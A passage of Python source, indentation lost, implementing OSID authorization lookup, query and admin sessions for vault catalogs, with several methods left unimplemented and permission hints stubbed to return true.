self._catalog_name = 'Vault'
OsidSession._init_object(
self,
catalog_id,
proxy,
runtime,
db_name='authorization',
cat_name='Vault',
cat_class=objects.Vault)
self._kwargs = kwargs
def get_vault_id(self):
"""Gets the ``Vault`` ``Id`` associated with this session.
return: (osid.id.Id) - the ``Vault Id`` associated with this
session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin_id
return self._catalog_id
vault_id = property(fget=get_vault_id)
def get_vault(self):
"""Gets the ``Vault`` associated with this session.
return: (osid.authorization.Vault) - the ``Vault`` associated
with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin
return self._catalog
vault = property(fget=get_vault)
def can_lookup_authorizations(self):
"""Tests if this user can perform authorization lookups.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer lookup
operations to unauthorized users.
return: (boolean) - ``false`` if lookup methods are not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.can_lookup_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
def use_comparative_authorization_view(self):
"""The returns from the lookup methods may omit or translate elements based on this session, such as authorization, and not result in an error.
This view is used when greater interoperability is desired at
the expense of precision.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_comparative_resource_view
self._use_comparative_object_view()
def use_plenary_authorization_view(self):
"""A complete view of the ``Authorization`` returns is desired.
Methods will return what is requested or result in an error.
This view is used when greater precision is desired at the
expense of interoperability.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_plenary_resource_view
self._use_plenary_object_view()
def use_federated_vault_view(self):
"""Federates the view for methods in this session.
A federated view will include authorizations in vaults which are
children of this vault in the vault hierarchy.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_federated_bin_view
self._use_federated_catalog_view()
def use_isolated_vault_view(self):
"""Isolates the view for methods in this session.
An isolated view restricts lookups to this vault only.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_isolated_bin_view
self._use_isolated_catalog_view()
def use_effective_authorization_view(self):
"""Only authorizations whose effective dates are current are returned by methods in this session.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.relationship.RelationshipLookupSession.use_effective_relationship_view
self._use_effective_view()
def use_any_effective_authorization_view(self):
"""All authorizations of any effective dates are returned by all methods in this session.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.relationship.RelationshipLookupSession.use_any_effective_relationship_view
self._use_any_effective_view()
def use_implicit_authorization_view(self):
"""Sets the view for methods in this session to implicit authorizations.
An implicit view will include authorizations derived from other
authorizations as a result of the ``Qualifier,`` ``Function`` or
``Resource`` hierarchies. This method is the opposite of
``explicitAuthorizationView()``.
*compliance: mandatory -- This method is must be implemented.*
"""
raise errors.Unimplemented()
def use_explicit_authorization_view(self):
"""Sets the view for methods in this session to explicit authorizations.
An explicit view includes only those authorizations that were
explicitly defined and not implied. This method is the opposite
of ``implicitAuthorizationView()``.
*compliance: mandatory -- This method is must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorization(self, authorization_id):
"""Gets the ``Authorization`` specified by its ``Id``.
In plenary mode, the exact ``Id`` is found or a ``NotFound``
results. Otherwise, the returned ``Authorization`` may have a
different ``Id`` than requested, such as the case where a
duplicate ``Id`` was assigned to an ``Authorization`` and
retained for compatibility.
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization`` to retrieve
return: (osid.authorization.Authorization) - the returned
``Authorization``
raise: NotFound - no ``Authorization`` found with the given
``Id``
raise: NullArgument - ``authorization_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resource
# NOTE: This implementation currently ignores plenary view
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find_one(
dict({'_id': ObjectId(self._get_id(authorization_id, 'authorization').get_identifier())},
**self._view_filter()))
return objects.Authorization(osid_object_map=result, runtime=self._runtime, proxy=self._proxy)
@utilities.arguments_not_none
def get_authorizations_by_ids(self, authorization_ids):
"""Gets an ``AuthorizationList`` corresponding to the given ``IdList``.
In plenary mode, the returned list contains all of the
authorizations specified in the ``Id`` list, in the order of the
list, including duplicates, or an error results if an ``Id`` in
the supplied list is not found or inaccessible. Otherwise,
inaccessible ``Authorizations`` may be omitted from the list and
may present the elements in any order including returning a
unique set.
arg: authorization_ids (osid.id.IdList): the list of ``Ids``
to retrieve
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NotFound - an ``Id was`` not found
raise: NullArgument - ``authorization_ids`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resources_by_ids
# NOTE: This implementation currently ignores plenary view
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
object_id_list = []
for i in authorization_ids:
object_id_list.append(ObjectId(self._get_id(i, 'authorization').get_identifier()))
result = collection.find(
dict({'_id': {'$in': object_id_list}},
**self._view_filter()))
result = list(result)
sorted_result = []
for object_id in object_id_list:
for object_map in result:
if object_map['_id'] == object_id:
sorted_result.append(object_map)
break
return objects.AuthorizationList(sorted_result, runtime=self._runtime, proxy=self._proxy)
@utilities.arguments_not_none
def get_authorizations_by_genus_type(self, authorization_genus_type):
"""Gets an ``AuthorizationList`` corresponding to the given authorization genus ``Type`` which does not include authorizations of genus types derived from the specified ``Type``.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
arg: authorization_genus_type (osid.type.Type): an
authorization genus type
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: NullArgument - ``authorization_genus_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resources_by_genus_type
# NOTE: This implementation currently ignores plenary view
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find(
dict({'genusTypeId': str(authorization_genus_type)},
**self._view_filter())).sort('_id', DESCENDING)
return objects.AuthorizationList(result, runtime=self._runtime, proxy=self._proxy)
@utilities.arguments_not_none
def get_authorizations_by_parent_genus_type(self, authorization_genus_type):
"""Gets an ``AuthorizationList`` corresponding to the given authorization genus ``Type`` and include authorizations of genus types derived from the specified ``Type``.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
arg: authorization_genus_type (osid.type.Type): an
authorization genus type
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: NullArgument - ``authorization_genus_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resources_by_parent_genus_type
# STILL NEED TO IMPLEMENT!!!
return objects.AuthorizationList([])
@utilities.arguments_not_none
def get_authorizations_by_record_type(self, authorization_record_type):
"""Gets an ``AuthorizationList`` containing the given authorization record ``Type``.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
arg: authorization_record_type (osid.type.Type): an
authorization record type
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: NullArgument - ``authorization_record_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resources_by_record_type
# STILL NEED TO IMPLEMENT!!!
return objects.AuthorizationList([])
@utilities.arguments_not_none
def get_authorizations_on_date(self, from_, to):
"""Gets an ``AuthorizationList`` effective during the entire given date range inclusive but not confined to the date range.
arg: from (osid.calendaring.DateTime): starting date
arg: to (osid.calendaring.DateTime): ending date
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: InvalidArgument - ``from`` is greater than ``to``
raise: NullArgument - ``from`` or ``to`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.relationship.RelationshipLookupSession.get_relationships_on_date
authorization_list = []
for authorization in self.get_authorizations():
if overlap(from_, to, authorization.start_date, authorization.end_date):
authorization_list.append(authorization)
return objects.AuthorizationList(authorization_list, runtime=self._runtime)
@utilities.arguments_not_none
def get_authorizations_for_resource(self, resource_id):
"""Gets a list of ``Authorizations`` associated with a given resource.
Authorizations related to the given resource, including those
related through an ``Agent,`` are returned. In plenary mode, the
returned list contains all known authorizations or an error
results. Otherwise, the returned list may contain only those
authorizations that are accessible through this session.
arg: resource_id (osid.id.Id): a resource ``Id``
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NullArgument - ``resource_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_for_resource_on_date(self, resource_id, from_, to):
"""Gets an ``AuthorizationList`` effective during the entire given date range inclusive but not confined to the date range.
Authorizations related to the given resource, including those
related through an ``Agent,`` are returned.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
In effective mode, authorizations are returned that are
currently effective. In any effective mode, active
authorizations and those currently expired are returned.
arg: resource_id (osid.id.Id): a resource ``Id``
arg: from (osid.calendaring.DateTime): starting date
arg: to (osid.calendaring.DateTime): ending date
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: InvalidArgument - ``from`` is greater than ``to``
raise: NullArgument - ``resource_id, from`` or ``to`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_for_agent(self, agent_id):
"""Gets a list of ``Authorizations`` associated with a given agent.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
arg: agent_id (osid.id.Id): an agent ``Id``
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NullArgument - ``agent_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_for_agent_on_date(self, agent_id, from_, to):
"""Gets an ``AuthorizationList`` for the given agent and effective during the entire given date range inclusive but not confined to the date range.
arg: agent_id (osid.id.Id): an agent ``Id``
arg: from (osid.calendaring.DateTime): starting date
arg: to (osid.calendaring.DateTime): ending date
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: InvalidArgument - ``from`` is greater than ``to``
raise: NullArgument - ``agent_id, from`` or ``to`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_for_function(self, function_id):
"""Gets a list of ``Authorizations`` associated with a given function.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
arg: function_id (osid.id.Id): a function ``Id``
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NullArgument - ``function_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.learning.ActivityLookupSession.get_activities_for_objective_template
# NOTE: This implementation currently ignores plenary view
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find(
dict({'functionId': str(function_id)},
**self._view_filter()))
return objects.AuthorizationList(result, runtime=self._runtime)
@utilities.arguments_not_none
def get_authorizations_for_function_on_date(self, function_id, from_, to):
"""Gets an ``AuthorizationList`` for the given function and effective during the entire given date range inclusive but not confined to the date range.
arg: function_id (osid.id.Id): a function ``Id``
arg: from (osid.calendaring.DateTime): starting date
arg: to (osid.calendaring.DateTime): ending date
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: InvalidArgument - ``from`` is greater than ``to``
raise: NullArgument - ``function_id, from`` or ``to`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_for_resource_and_function(self, resource_id, function_id):
"""Gets a list of ``Authorizations`` associated with a given resource.
Authorizations related to the given resource, including those
related through an ``Agent,`` are returned. In plenary mode, the
returned list contains all known authorizations or an error
results. Otherwise, the returned list may contain only those
authorizations that are accessible through this session.
arg: resource_id (osid.id.Id): a resource ``Id``
arg: function_id (osid.id.Id): a function ``Id``
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NullArgument - ``resource_id`` or ``function_id`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.relationship.RelationshipLookupSession.get_relationships_for_peers
# NOTE: This implementation currently ignores plenary and effective views
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find(
dict({'sourceId': str(resource_id),
'destinationId': str(function_id)},
**self._view_filter())).sort('_id', ASCENDING)
return objects.AuthorizationList(result, runtime=self._runtime)
@utilities.arguments_not_none
def get_authorizations_for_resource_and_function_on_date(self, resource_id, function_id, from_, to):
"""Gets an ``AuthorizationList`` effective during the entire given date range inclusive but not confined to the date range.
Authorizations related to the given resource, including those
related through an ``Agent,`` are returned.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
In effective mode, authorizations are returned that are
currently effective. In any effective mode, active
authorizations and those currently expired are returned.
arg: resource_id (osid.id.Id): a resource ``Id``
arg: function_id (osid.id.Id): a function ``Id``
arg: from (osid.calendaring.DateTime): starting date
arg: to (osid.calendaring.DateTime): ending date
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: InvalidArgument - ``from`` is greater than ``to``
raise: NullArgument - ``resource_id, function_id, from`` or
``to`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_for_agent_and_function(self, agent_id, function_id):
"""Gets a list of ``Authorizations`` associated with a given agent.
Authorizations related to the given resource, including those
related through an ``Agent,`` are returned. In plenary mode, the
returned list contains all known authorizations or an error
results. Otherwise, the returned list may contain only those
authorizations that are accessible through this session.
arg: agent_id (osid.id.Id): an agent ``Id``
arg: function_id (osid.id.Id): a function ``Id``
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NullArgument - ``agent_id`` or ``function_id`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find(
dict({'agentId': str(agent_id),
'functionId': str(function_id)},
**self._view_filter())).sort('_sort_id', ASCENDING)
return objects.AuthorizationList(result, runtime=self._runtime)
@utilities.arguments_not_none
def get_authorizations_for_agent_and_function_on_date(self, agent_id, function_id, from_, to):
"""Gets an ``AuthorizationList`` for the given agent and effective during the entire given date range inclusive but not confined to the date range.
arg: agent_id (osid.id.Id): an agent ``Id``
arg: function_id (osid.id.Id): a function ``Id``
arg: from (osid.calendaring.DateTime): starting date
arg: to (osid.calendaring.DateTime): ending date
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: InvalidArgument - ``from`` is greater than ``to``
raise: NullArgument - ``agent_id, function_id, from`` or ``to``
is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_by_qualifier(self, qualifier_id):
"""Gets a list of ``Authorizations`` associated with a given qualifier.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
arg: qualifier_id (osid.id.Id): a qualifier ``Id``
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NullArgument - ``qualifier_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_explicit_authorization(self, authorization_id):
"""Gets the explicit ``Authorization`` that generated the given implicit authorization.
If the given ``Authorization`` is explicit, then the same
``Authorization`` is returned.
arg: authorization_id (osid.id.Id): an authorization
return: (osid.authorization.Authorization) - the explicit
``Authorization``
raise: NotFound - ``authorization_id`` is not found
raise: NullArgument - ``authorization_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_authorizations(self):
"""Geta all ``Authorizations``.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
return: (osid.authorization.AuthorizationList) - a list of
``Authorizations``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resources
# NOTE: This implementation currently ignores plenary view
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find(self._view_filter()).sort('_id', DESCENDING)
return objects.AuthorizationList(result, runtime=self._runtime, proxy=self._proxy)
authorizations = property(fget=get_authorizations)
class AuthorizationQuerySession(abc_authorization_sessions.AuthorizationQuerySession, osid_sessions.OsidSession):
"""This session provides methods for searching ``Authorization`` objects.
The search query is constructed using the ``AuthorizationQuery``.
This session defines views that offer differing behaviors for
searching.
* federated view: searches include authorizations in ``Vaults`` of
which this vault is a ancestor in the vault hierarchy
* isolated view: searches are restricted to authorizations in this
``Vault``
* implicit authorization view: authorizations include implicit
authorizations
* explicit authorization view: only explicit authorizations are
returned
"""
def __init__(self, catalog_id=None, proxy=None, runtime=None, **kwargs):
OsidSession.__init__(self)
self._catalog_class = objects.Vault
self._catalog_name = 'Vault'
OsidSession._init_object(
self,
catalog_id,
proxy,
runtime,
db_name='authorization',
cat_name='Vault',
cat_class=objects.Vault)
self._kwargs = kwargs
def get_vault_id(self):
"""Gets the ``Vault`` ``Id`` associated with this session.
return: (osid.id.Id) - the ``Vault Id`` associated with this
session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin_id
return self._catalog_id
vault_id = property(fget=get_vault_id)
def get_vault(self):
"""Gets the ``Vault`` associated with this session.
return: (osid.authorization.Vault) - the ``Vault`` associated
with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin
return self._catalog
vault = property(fget=get_vault)
def can_search_authorizations(self):
"""Tests if this user can perform authorization searches.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer search
operations to unauthorized users.
return: (boolean) - ``false`` if search methods are not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceQuerySession.can_search_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
def use_federated_vault_view(self):
"""Federates the view for methods in this session.
A federated view will include authorizations in vaults which are
children of this vault in the vault hierarchy.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_federated_bin_view
self._use_federated_catalog_view()
def use_isolated_vault_view(self):
"""Isolates the view for methods in this session.
An isolated view restricts searches to this vault only.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_isolated_bin_view
self._use_isolated_catalog_view()
def use_implicit_authorization_view(self):
"""Sets the view for methods in this session to implicit authorizations.
An implicit view will include authorizations derived from other
authorizations as a result of the ``Qualifier,`` ``Function`` or
``Resource`` hierarchies. This method is the opposite of
``explicit_aut``
*compliance: mandatory -- This method is must be implemented.*
"""
raise errors.Unimplemented()
def use_explicit_authorization_view(self):
"""Sets the view for methods in this session to explicit authorizations.
An explicit view includes only those authorizations that were
explicitly defined and not implied. This method is the opposite
of ``implicitAuthorizationView()``.
*compliance: mandatory -- This method is must be implemented.*
"""
raise errors.Unimplemented()
def get_authorization_query(self):
"""Gets an authorization query.
return: (osid.authorization.AuthorizationQuery) - the
authorization query
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceQuerySession.get_resource_query_template
return queries.AuthorizationQuery(runtime=self._runtime)
authorization_query = property(fget=get_authorization_query)
@utilities.arguments_not_none
def get_authorizations_by_query(self, authorization_query):
"""Gets a list of ``Authorizations`` matching the given query.
arg: authorization_query
(osid.authorization.AuthorizationQuery): the
authorization query
return: (osid.authorization.AuthorizationList) - the returned
``AuthorizationList``
raise: NullArgument - ``authorization_query`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``authorization_query`` is not of this
service
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceQuerySession.get_resources_by_query
and_list = list()
or_list = list()
for term in authorization_query._query_terms:
if '$in' in authorization_query._query_terms[term] and '$nin' in authorization_query._query_terms[term]:
and_list.append(
{'$or': [{term: {'$in': authorization_query._query_terms[term]['$in']}},
{term: {'$nin': authorization_query._query_terms[term]['$nin']}}]})
else:
and_list.append({term: authorization_query._query_terms[term]})
for term in authorization_query._keyword_terms:
or_list.append({term: authorization_query._keyword_terms[term]})
if or_list:
and_list.append({'$or': or_list})
view_filter = self._view_filter()
if view_filter:
and_list.append(view_filter)
if and_list:
query_terms = {'$and': and_list}
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find(query_terms).sort('_id', DESCENDING)
else:
result = []
return objects.AuthorizationList(result, runtime=self._runtime, proxy=self._proxy)
class AuthorizationAdminSession(abc_authorization_sessions.AuthorizationAdminSession, osid_sessions.OsidSession):
"""This session creates, updates, and deletes ``Authorizations``.
The data for create and update is provided by the consumer via the
form object. ``OsidForms`` are requested for each create or update
and may not be reused.
Create and update operations differ in their usage. To create an
``Authorization,`` an ``AuthorizationForm`` is requested using
``get_authorization_form_for_create()`` specifying the desired
relationship peers and record ``Types`` or none if no record
``Types`` are needed. The returned ``AuthorizationForm`` will
indicate that it is to be used with a create operation and can be
used to examine metdata or validate data prior to creation. Once the
``AuthorizationForm`` is submiited to a create operation, it cannot
be reused with another create operation unless the first operation
was unsuccessful. Each ``AuthorizationForm`` corresponds to an
attempted transaction.
For updates, ``AuthorizationForms`` are requested to the
``Authorization`` ``Id`` that is to be updated using
``getAuthorizationFormForUpdate()``. Similarly, the
``AuthorizationForm`` has metadata about the data that can be
updated and it can perform validation before submitting the update.
The ``AuthorizationForm`` can only be used once for a successful
update and cannot be reused.
The delete operations delete ``Authorizations``. To unmap an
``Authorization`` from the current ``Vault,`` the
``AuthorizationVaultAssignmentSession`` should be used. These delete
operations attempt to remove the ``Authorization`` itself thus
removing it from all known ``Vault`` catalogs.
This session includes an ``Id`` aliasing mechanism to assign an
external ``Id`` to an internally assigned Id.
"""
def __init__(self, catalog_id=None, proxy=None, runtime=None, **kwargs):
OsidSession.__init__(self)
self._catalog_class = objects.Vault
self._catalog_name = 'Vault'
OsidSession._init_object(
self,
catalog_id,
proxy,
runtime,
db_name='authorization',
cat_name='Vault',
cat_class=objects.Vault)
self._forms = dict()
self._kwargs = kwargs
def get_vault_id(self):
"""Gets the ``Vault`` ``Id`` associated with this session.
return: (osid.id.Id) - the ``Vault Id`` associated with this
session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin_id
return self._catalog_id
vault_id = property(fget=get_vault_id)
def get_vault(self):
"""Gets the ``Vault`` associated with this session.
return: (osid.authorization.Vault) - the ``Vault`` associated
with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin
return self._catalog
vault = property(fget=get_vault)
def can_create_authorizations(self):
"""Tests if this user can create ``Authorizations``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer create
operations to unauthorized users.
return: (boolean) - ``false`` if ``Authorization`` creation is
not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.can_create_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def can_create_authorization_with_record_types(self, authorization_record_types):
"""Tests if this user can create a single ``Authorization`` using the desired record types.
While ``AuthorizationManager.getAuthorizationRecordTypes()`` can
be used to examine which records are supported, this method
tests which record(s) are required for creating a specific
``Authorization``. Providing an empty array tests if an
``Authorization`` can be created with no records.
arg: authorization_record_types (osid.type.Type[]): array of
authorization record types
return: (boolean) - ``true`` if ``Authorization`` creation using
the specified ``Types`` is supported, ``false``
otherwise
raise: NullArgument - ``authorization_record_types`` is
``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.can_create_resource_with_record_types
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def get_authorization_form_for_create_for_agent(self, agent_id, function_id, qualifier_id, authorization_record_types):
"""Gets the authorization form for creating new authorizations.
A new form should be requested for each create transaction.
arg: agent_id (osid.id.Id): the agent ``Id``
arg: function_id (osid.id.Id): the function ``Id``
arg: qualifier_id (osid.id.Id): the qualifier ``Id``
arg: authorization_record_types (osid.type.Type[]): array of
authorization record types
return: (osid.authorization.AuthorizationForm) - the
authorization form
raise: NotFound - ``agent_id, function_id`` or ``qualifier_id``
is not found
raise: NullArgument - ``agent_id, function_id, qualifier_id``
or ``authorization_record_types`` is ``null``
raise: OperationFailed - ``unable to complete request``
raise: PermissionDenied - authorization failure
raise: Unsupported - unable to get form with requested record
types
*compliance: mandatory -- This method must be implemented.*
"""
if not isinstance(agent_id, ABCId):
raise errors.InvalidArgument('argument is not a valid OSID Id')
if not isinstance(function_id, ABCId):
raise errors.InvalidArgument('argument is not a valid OSID Id')
if not isinstance(qualifier_id, ABCId):
raise errors.InvalidArgument('argument is not a valid OSID Id')
for arg in authorization_record_types:
if not isinstance(arg, ABCType):
raise errors.InvalidArgument('one or more argument array elements is not a valid OSID Type')
if authorization_record_types == []:
# WHY are we passing vault_id = self._catalog_id below, seems redundant:
# We probably also don't need to send agent_id. The form can now get that from the proxy
obj_form = objects.AuthorizationForm(
vault_id=self._catalog_id,
agent_id=agent_id,
function_id=function_id,
qualifier_id=qualifier_id,
catalog_id=self._catalog_id,
runtime=self._runtime,
proxy=self._proxy)
else:
obj_form = objects.AuthorizationForm(
vault_id=self._catalog_id,
record_types=authorization_record_types,
agent_id=agent_id,
function_id=function_id,
qualifier_id=qualifier_id,
catalog_id=self._catalog_id,
runtime=self._runtime,
proxy=self._proxy)
obj_form._for_update = False
self._forms[obj_form.get_id().get_identifier()] = not CREATED
return obj_form
@utilities.arguments_not_none
def get_authorization_form_for_create_for_resource(self, resource_id, function_id, qualifier_id, authorization_record_types):
"""Gets the authorization form for creating new authorizations.
A new form should be requested for each create transaction.
arg: resource_id (osid.id.Id): the resource ``Id``
arg: function_id (osid.id.Id): the function ``Id``
arg: qualifier_id (osid.id.Id): the qualifier ``Id``
arg: authorization_record_types (osid.type.Type[]): array of
authorization record types
return: (osid.authorization.AuthorizationForm) - the
authorization form
raise: NotFound - ``resource_id, function_id`` or
``qualifier_id`` is not found
raise: NullArgument - ``resource_id, function_id,
qualifier_id,`` or ``authorization_record_types`` is
``null``
raise: OperationFailed - ``unable to complete request``
raise: PermissionDenied - authorization failure
raise: Unsupported - unable to get form with requested record
types
*compliance: mandatory -- This method must be implemented.*
"""
if not isinstance(resource_id, ABCId):
raise errors.InvalidArgument('argument is not a valid OSID Id')
if not isinstance(function_id, ABCId):
raise errors.InvalidArgument('argument is not a valid OSID Id')
if not isinstance(qualifier_id, ABCId):
raise errors.InvalidArgument('argument is not a valid OSID Id')
for arg in authorization_record_types:
if not isinstance(arg, ABCType):
raise errors.InvalidArgument('one or more argument array elements is not a valid OSID Type')
if authorization_record_types == []:
# WHY are we passing vault_id = self._catalog_id below, seems redundant:
obj_form = objects.AuthorizationForm(
vault_id=self._catalog_id,
resource_id=resource_id,
function_id=function_id,
qualifier_id=qualifier_id,
catalog_id=self._catalog_id,
runtime=self._runtime,
prox=self._proxy)
else:
obj_form = objects.AuthorizationForm(
vault_id=self._catalog_id,
